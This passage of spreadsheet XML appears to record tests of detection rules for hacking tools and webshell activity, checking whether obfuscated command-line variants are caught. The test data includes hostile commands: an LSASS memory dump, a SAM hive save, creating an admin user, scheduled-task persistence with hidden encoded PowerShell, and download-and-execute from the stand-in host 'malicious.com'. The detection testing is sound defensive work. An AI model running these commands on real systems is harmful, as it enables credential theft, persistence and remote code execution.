      <c r="F400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="36" t="n"/>
      <c r="J400" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="n"/>
      <c r="B401" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C401" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D401" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E401" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H401" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J401" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K401" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="n"/>
      <c r="B402" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C402" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D402" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E402" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I402" s="43" t="n"/>
      <c r="J402" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="403" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="n"/>
      <c r="B403" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C403" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D403" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E403" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F403" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G403" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I403" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J403" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="404" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="n"/>
      <c r="B404" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C404" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D404" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E404" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F404" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G404" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H404" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I404" s="43" t="n"/>
      <c r="J404" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K404" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="n"/>
      <c r="B405" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C405" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D405" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E405" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F405" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G405" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H405" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I405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405" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K405" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="406" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="n"/>
      <c r="B406" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C406" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D406" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E406" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I406" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J406" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K406" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="407" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="n"/>
      <c r="B407" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C407" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D407" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E407" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I407" s="36" t="n"/>
      <c r="J407" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K407" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="n"/>
      <c r="B408" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C408" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D408" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E408" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K408" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="409" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="n"/>
      <c r="B409" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C409" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D409" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E409" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I409" s="43" t="n"/>
      <c r="J409" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K409" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="n"/>
      <c r="B410" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C410" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D410" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E410" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I410" s="36" t="n"/>
      <c r="J410" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K410" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="n"/>
      <c r="B411" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C411" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D411" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E411" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K411" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="412" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="n"/>
      <c r="B412" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C412" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D412" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E412" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I412" s="36" t="n"/>
      <c r="J412" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K412" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="413" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="n"/>
      <c r="B413" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C413" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D413" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E413" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I413" s="36" t="n"/>
      <c r="J413" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K413" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="n"/>
      <c r="B414" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C414" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D414" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E414" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I414" s="43" t="n"/>
      <c r="J414" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K414" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="n"/>
      <c r="B415" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C415" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D415" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E415" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H415" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I415" s="36" t="n"/>
      <c r="J415" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K415" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="n"/>
      <c r="B416" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C416" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D416" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E416" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I416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416" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K416" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="n"/>
      <c r="B417" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C417" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D417" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E417" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="36" t="n"/>
      <c r="J417" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K417" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="n"/>
      <c r="B418" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C418" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D418" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E418" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F418" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G418" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I418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418" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K418" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="n"/>
      <c r="B419" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C419" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D419" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E419" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F419" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G419" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H419" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I419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419" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K419" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="n"/>
      <c r="B420" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C420" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D420" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E420" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H420" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="43" t="n"/>
      <c r="J420" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K420" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="43" t="n"/>
      <c r="B421" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C421" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D421" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E421" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "BypassTask" /TR "powershell.exe -NoPROFiLE -WiNdoWStYlE Hidden -"EncodedCommand" JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /Mo 30</t>
        </is>
      </c>
      <c r="F421" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G421" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J421" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K421" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="43" t="n"/>
      <c r="B422" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C422" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D422" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E422" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F422" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G422" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I422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422" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K422" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="43" t="n"/>
      <c r="B423" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C423" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D423" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E423" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="36" t="n"/>
      <c r="J423" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K423" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="424" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="43" t="n"/>
      <c r="B424" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C424" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D424" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E424" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I424" s="43" t="n"/>
      <c r="J424" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K424" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="425" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="43" t="n"/>
      <c r="B425" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C425" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D425" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E425" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H425" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I425" s="36" t="n"/>
      <c r="J425" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K425" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="426" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="43" t="n"/>
      <c r="B426" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C426" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D426" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E426" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I426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426" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K426" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="n"/>
      <c r="B427" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C427" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D427" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E427" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I427" s="43" t="n"/>
      <c r="J427" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K427" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="n"/>
      <c r="B428" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C428" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D428" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E428" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H428" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I428" s="36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428" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K428" s="36" t="b">
